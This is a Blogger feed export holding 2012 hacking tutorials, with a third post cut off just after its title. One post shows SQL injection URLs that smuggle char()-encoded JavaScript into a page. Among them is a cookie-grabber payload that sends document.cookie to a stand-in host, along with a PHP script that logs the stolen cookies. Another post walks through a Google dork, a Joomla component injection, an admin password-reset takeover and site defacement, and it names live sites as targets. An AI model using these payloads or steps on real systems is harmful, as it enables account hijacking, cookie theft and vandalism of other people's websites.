tag:blogger.com,1999:blog-51591769943297521502024-02-20T09:27:14.793+08:00Tune LOL :Dwill post anything about everything :DAdios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.comBlogger28125tag:blogger.com,1999:blog-5159176994329752150.post-29294948620235698702012-02-19T00:03:00.000+08:002012-02-19T00:03:30.976+08:00XFS - XSS From SQL<b style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"></b><br />
<div id="posts"><div align="center"><div class="page" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; text-align: left; width: 1479px;"><div align="left" style="padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><div id="edit34640" style="padding-bottom: 6px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"><div style="text-align: justify;"><b><b>XFS - XSS From SQL</b></b></div><div style="text-align: justify;"><span style="font-weight: 800;"><br />
</span></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>[------------------------------------------------------------------------]</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>[+] Summary</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>[1] Presentation</b></div><div style="font-weight: bold; text-align: justify;"><b>[2] Explanation</b></div><div style="font-weight: bold; text-align: justify;"><b>[3] Demonstration</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>[------------------------------------------------------------------------]</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>[1] --[Presentation]--</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>XFS is a SQL deviation who lets return javascript code by through of the </b></div><div style="font-weight: bold; text-align: justify;"><b>function char().</b><b style="text-align: -webkit-auto;"><div style="display: inline !important; text-align: justify;"><b>This function convert an ASCII code to char, this why we'll </b></div></b></div><div style="font-weight: bold; text-align: justify;"><b style="text-align: -webkit-auto;"><div style="display: inline !important; text-align: justify;"><b>use it to execute javascript code.</b></div></b><b>The XFS can give you a restricted XSS </b></div><div style="font-weight: bold; text-align: justify;"><b>possibility and obviously the SQL vulnerabilty.</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>So for XFS we need :</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>- String to ASCII converter</b></div><div style="font-weight: bold; text-align: justify;"><b>- The function char()</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>In the next parties you will see the conditions for do it, how it work </b></div><div style="font-weight: bold; text-align: justify;"><b>and demonstration.</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>[2] --[Explanation]--</b></div><div style="font-weight: bold; text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><b>To use it, you need to convert your string in ASCII </b></div></div><div id="edit34640" style="padding-bottom: 6px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"><div style="text-align: justify;"><b><b>(Online Converter : <a href="http://elite-soft.org/redirect-to/?redirect=http%3A%2F%2Fwww.easycalculation.com%2Fascii-hex.php" target="_blank">http://www.easycalculation.com/ascii-hex.php</a>).</b></b></div><div style="font-weight: bold; text-align: justify;"><b><b>Char() will read the ASCII code and return it, so if you insert </b></b></div><div style="font-weight: bold; text-align: justify;"><b><b>the ASCII javascript code, </b></b><b><b>char() will return you the </b></b></div></div><div id="edit34640" style="padding-bottom: 6px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"><div style="font-weight: bold; text-align: justify;"><b><b>javascript code and it will be executed BUT when you encode your javascript </b></b></div><div style="font-weight: bold; text-align: justify;"><b><b>code, this code</b></b><b><b>mustn't have any space, so the XSS is restricted</b></b></div></div><div id="edit34640" style="padding-bottom: 6px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"><div style="font-weight: bold; text-align: justify;"><b><b>but you can grab, alert and a lot of other XSS thing.</b></b></div><div style="text-align: justify;"><span style="font-weight: 800;"><br />
</span></div><span style="font-weight: bold;"><div style="text-align: justify;">Example :</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">If you want convert your javascript code to ASCII, for work, the javascript </div><div style="text-align: justify;">code mustn't <b><b>to be like it :</b></b></div></span></div><div id="edit34640" style="padding-bottom: 6px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"><div style="text-align: justify;"><span style="font-weight: 800;"><br />
</span></div><b><div style="font-weight: bold; text-align: justify;"><b style="font-weight: bold;"><script > alert(document.cookie) </script> <= You need to delete space :</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b><script>alert(document.cookie)</script> <= Its okay, you can convert it in ASCII</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>When the code will be convert in ASCII, you will get a thing like it :</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>46 65 42 12 85 68 ...</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>But before put it in char(ASCII), we need to replace space by "," like it :</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>46,65,42,12,85,68 ... <= Its okay for put in char()</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>[3] --[Demonstration]--</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>Vuln website :</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>- <a href="http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,char%28ASCII_CODE%29,7,8--" target="_blank">http://landfill.elvinbts.org/show_ac...II_CODE),7,8--</a></b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>Some javascript codes without space :</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>Alert :</b></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><b>################################</b></div><div style="text-align: justify;"><b>#</b></div><div style="text-align: justify;"><b>#- String : <SCRIPT>alert('xss')</script></b></div><div style="text-align: justify;"><b>#</b></div><div style="text-align: justify;"><b>#- ASCII : 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 #41 60 </b></div></b></div><div id="edit34640" style="padding-bottom: 6px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"><div style="text-align: justify;"><b><b>47 115 99 114 105 112 116 62 </b></b></div><div style="font-weight: bold; text-align: justify;"><b><b>#</b></b></div><div style="font-weight: bold; text-align: justify;"><b><b>################################</b></b></div><div style="text-align: justify;"><span style="font-weight: 800;"><br />
</span></div><span style="font-weight: bold;"><div style="text-align: justify;">Cookie Grabber :</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">################################</div></span><span style="font-weight: bold;"><div style="text-align: justify;">#</div></span><span style="font-weight: bold;"><div style="text-align: justify;">#- String : </div></span></div><div id="edit34640" style="padding-bottom: 6px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"><div style="text-align: justify;"><b><b><SCRIPT>location.href='http://www.yoursite.com/cookie.php?#cookie='</b></b></div><div style="text-align: justify;"><b><b>+escape(document.cookie)</SCRIPT></b></b></div><b><div style="text-align: justify;"><b><b>#</b></b></div><b><div style="text-align: justify;"><b><b>#- ASCII : 60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 </b></b></div><div style="text-align: justify;"><b><b>110 46 104 114 101 102 61 39 104 </b></b><b><b>116 116 112 58 47 47 119 </b></b></div><div style="text-align: justify;"><b><b>119 119 46 121 111 117 114 115 105 116 101 46 99 111 109 </b></b></div><div style="text-align: justify;"><b><b>47 99 111 </b></b><b><b>111 107 105 101 46 112 104 112 63 99 111 111 107</b></b></div><div style="text-align: justify;"><b><b> 105 101 61 39 43 101 115 99 97 112 101 40 </b></b><b><b>100 111 99 117 </b></b></div><div style="text-align: justify;"><b><b>109 101 110 116 46 99 111 111 107 105 101 41 60 47 83 67 </b></b></div><div style="text-align: justify;"><b><b>82 73 80 84 62 </b></b></div></b></b></div><div id="edit34640" style="padding-bottom: 6px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"><div style="font-weight: bold; text-align: justify;"><b><b>#</b></b></div><div style="font-weight: bold; text-align: justify;"><b><b>################################</b></b></div><div style="text-align: justify;"><span style="font-weight: 800;"><br />
</span></div><span style="font-weight: bold;"><div style="text-align: justify;">Cookie Grabber file :</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">################################</div></span><span style="font-weight: bold;"><div style="text-align: justify;">#</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;"># <?php</div></span><span style="font-weight: bold;"><div style="text-align: justify;">#</div></span><span style="font-weight: bold;"><div style="text-align: justify;">#</div></span><span style="font-weight: bold;"><div style="text-align: justify;">$cookies = $_GET["cookie"];</div></span><span style="font-weight: bold;"><div style="text-align: justify;">#</div></span><span style="font-weight: bold;"><div style="text-align: justify;"># if($cookies)</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;"># {</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">#</div></span><span style="font-weight: bold;"><div style="text-align: justify;"># $grab = fopen("grab.txt","a");</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;"># fputs($grab, $cookies . "\r\n");</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;"># fclose($grab);</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">#</div></span><span style="font-weight: bold;"><div style="text-align: justify;"># }</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">#</div></span><span style="font-weight: bold;"><div style="text-align: justify;"># ?></div></span><span style="font-weight: bold;"><div style="text-align: justify;">#</div></span><span style="font-weight: bold;"><div style="text-align: justify;">################################</div></span> <div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">So before insert your ASCII in char(), you must replace </div><div style="text-align: justify;">(in the ASCII code) all space by ",".</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">Example :</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">################################</div></span><span style="font-weight: bold;"><div style="text-align: justify;"># 45 52 86 23 54 ...</div></span><span style="font-weight: bold;"><div style="text-align: justify;"># To :</div></span><span style="font-weight: bold;"><div style="text-align: justify;"># 45,52,86,23,54 ...</div></span><span style="font-weight: bold;"><div style="text-align: justify;">################################</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">So lets go :</div></span> <div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">Alert :</div></span> <div style="text-align: justify;"><br />
</div><div style="font-weight: bold; text-align: justify;"><a href="http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,char%2860,83,67,82,73,80,84,62,97,108,101,114,116,40,39,120,115,115,39,41,60,47,115,99,114,105,112,116,62%29,7,8--" target="_blank">http://landfill.elvinbts.org/show_ac...,116,62),7,8--</a></div><div style="text-align: justify;"><br />
</div><span style="font-weight: bold;"><div style="text-align: justify;">You can see a textbox is executed with the text : "XSS" => it's the XSS alert</div></span></div></div></div></div></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com21tag:blogger.com,1999:blog-5159176994329752150.post-16640042952210928082012-02-18T23:47:00.000+08:002012-02-18T23:47:16.774+08:00Sqli Without Tools<span style="background-color: white;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Hi,</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">this is a tutorial based on other tutorial on HF but a little bit different, no sql tool used.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">1/ Finding Exploit And Target</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Google dork: inurl:"option=com_mytube"</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Type that Dork in Google.</span> </span><br />
<span style="background-color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;"><br />
</span><br />
<span style="background-color: white;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">2/ Inject Target</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Find a url like this:</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /></span><br />
<div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: left;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"><span style="background-color: white;">Code:</span></div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"><span style="background-color: white;">http://site.com/index.php?option=com_mytube&Itemid=88..</span></code></div></div><span style="background-color: white;"><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Now replace the url like this:</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Click here to view: </span><a href="http://pastebin.com/ZxxU8Nsr" style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left; text-decoration: none;" target="_blank">http://pastebin.com/ZxxU8Nsr</a><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">If the site is vulnerable, you can see something like this:</span> </span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSq6jjqEihNFz_biKIX3iKcqQS-irc7Q0MZzh_FwWv0AhZ58GRiM4jG_BlyZONnJsPaFTUC4EC6bpKSzFnrmDRK0NOZagP4z1Jxk7UiEFNtTFlD_N5wWDRSJvG3aFMGkhigAOcoNcDB1cQ/s1600/sanstitrecen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSq6jjqEihNFz_biKIX3iKcqQS-irc7Q0MZzh_FwWv0AhZ58GRiM4jG_BlyZONnJsPaFTUC4EC6bpKSzFnrmDRK0NOZagP4z1Jxk7UiEFNtTFlD_N5wWDRSJvG3aFMGkhigAOcoNcDB1cQ/s320/sanstitrecen.png" width="320" /></span></a></div><div style="text-align: left;"><span style="font-family: Verdana, Arial, sans-serif; font-size: x-small;"><span style="background-color: white; line-height: 18px;"><br />
</span></span></div><div style="text-align: left;"><span style="background-color: white;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">We can see username, email and activation code. (username:email:activation code)</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Now, let this page open and open a new page.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">3/ Admin password reset</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Go to:</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /></span></div><div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"><span style="background-color: white;">Code:</span></div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"><span style="background-color: white;">http://www.site.com/index.php?option=com_user&view=reset</span></code></div></div><span style="background-color: white;"><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">This is standard Joomla! query for password reset request</span> </span><br />
<div style="text-align: left;"><span style="background-color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQRk4ZLeaon-i8ZGsoBGYgW5axV7JcRjhyphenhyphen1zGlUlBp-pyjmCW2f_HM9OpfXpAPj0XpW3SnKo092OZsY8d74LONDDYVkJMsE4flJoEArO4B02bgg1S_h70Smbx64OQqiTE06KjG69Q72HgJ/s1600/sanstitrely.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQRk4ZLeaon-i8ZGsoBGYgW5axV7JcRjhyphenhyphen1zGlUlBp-pyjmCW2f_HM9OpfXpAPj0XpW3SnKo092OZsY8d74LONDDYVkJMsE4flJoEArO4B02bgg1S_h70Smbx64OQqiTE06KjG69Q72HgJ/s320/sanstitrely.png" width="320" /></span></a></div><div class="separator" style="clear: both; text-align: center;"><span style="background-color: white;"><br />
</span></div><div class="separator" style="clear: both; text-align: left;"><span style="background-color: white;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Type the email adress found in step 2 and press Submit.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">The activation code should be resetted.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Return to the first page, refresh the page and take the new activation code.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Paste him in the token and press Submit.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">problem with token.. :((<br />
<br />
UPDATE: Joomla! 1.5.16 now hashes the reset token<br />
<br />
if you see a thing like :$1$14411: after the activation code, it will not work</span> </span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe7rZVsEkpgDT8xcx6DV6bcF1XrHo5csY-anSLV8KmsHACkkJCoQGoo-QUU_jsPcRJjDOy4xGuYHZoYMUmnBuloTNs19DAY8EBbtVlFt06KmH16_2Lltq6vG5iiKJLhRbXQtxR9_D45EnY/s1600/sanstitregn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe7rZVsEkpgDT8xcx6DV6bcF1XrHo5csY-anSLV8KmsHACkkJCoQGoo-QUU_jsPcRJjDOy4xGuYHZoYMUmnBuloTNs19DAY8EBbtVlFt06KmH16_2Lltq6vG5iiKJLhRbXQtxR9_D45EnY/s1600/sanstitregn.png" /></span></a></div><div class="separator" style="clear: both; text-align: left;"><span style="background-color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"><br />
</span></div><div style="text-align: left;"><span style="background-color: white;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">4/ Admin Login</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">If you done everything ok, your Password page will load. Enter your new password...</span> </span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jAyDgufH40pC2cJDZUXgHLTOBUnT7gCDGyIswrJ0guOEBcGw_39eHXeKVmLSy1pNPYyevVqJlA8WnGtGAhoXki9n6RPeOQ7OfENxZXqOHS44-MmMxUbzSQq4zUV1SC6cZK5o1vPQAr1b/s1600/sanstitreda.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jAyDgufH40pC2cJDZUXgHLTOBUnT7gCDGyIswrJ0guOEBcGw_39eHXeKVmLSy1pNPYyevVqJlA8WnGtGAhoXki9n6RPeOQ7OfENxZXqOHS44-MmMxUbzSQq4zUV1SC6cZK5o1vPQAr1b/s320/sanstitreda.png" width="320" /></span></a></div><div class="separator" style="clear: both; text-align: left;"><span style="background-color: white;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">After that go to:</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /></span></div><div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"><span style="background-color: white;">Code:</span></div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"><span style="background-color: white;">http://www.site.com/administrator/</span></code></div></div><span style="background-color: white;"><br class="Apple-interchange-newline" /></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIhOec5Hwa8lVw45IDggjPg0geUXrq6M9u1MkeG4-pTOZw0rqkLEG2Peb_SJSkYrjRQMInzx97Mtg93l1S8so-Hq4R1Xh75PYHdVB1kjM4lGoUn6DoSo3z9wy7AtZU062LjLR5S19VTSIA/s1600/sanstitreti.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIhOec5Hwa8lVw45IDggjPg0geUXrq6M9u1MkeG4-pTOZw0rqkLEG2Peb_SJSkYrjRQMInzx97Mtg93l1S8so-Hq4R1Xh75PYHdVB1kjM4lGoUn6DoSo3z9wy7AtZU062LjLR5S19VTSIA/s320/sanstitreti.png" width="320" /></span></a></div><div class="separator" style="clear: both; text-align: left;"><span style="background-color: white;"><br />
</span></div><div class="separator" style="clear: both; text-align: left;"></div><div class="post_body" id="pid_6345699" style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><span style="background-color: white;">Standard Joomla portal content management system<br />
<br />
Enter the username (found in step 2) and your new password, click on Login<br />
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML<br />
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!<br />
<br />
[color=#FF0000]Vuln. site compatible with this tutorial: </span><div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"><span style="background-color: white;">Code:</span></div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"><span style="background-color: white;">http://www.mirditaturistike.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62</span></code></div></div></div><hr style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: Verdana, Arial, sans-serif; font-size: 13px; height: 1px; line-height: 18px; width: 292px;" /><span style="background-color: white;"><br class="Apple-interchange-newline" /></span><br />
<div style="text-align: left;"><span style="color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: x-small;"><span style="line-height: 18px;"><br />
</span></span></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-35682013030277178882012-02-18T23:26:00.000+08:002012-02-18T23:26:28.187+08:00Advance SQLIADVANCED SQL<br />
<br />
*********************************************************************************************************<br />
type of injection<br />
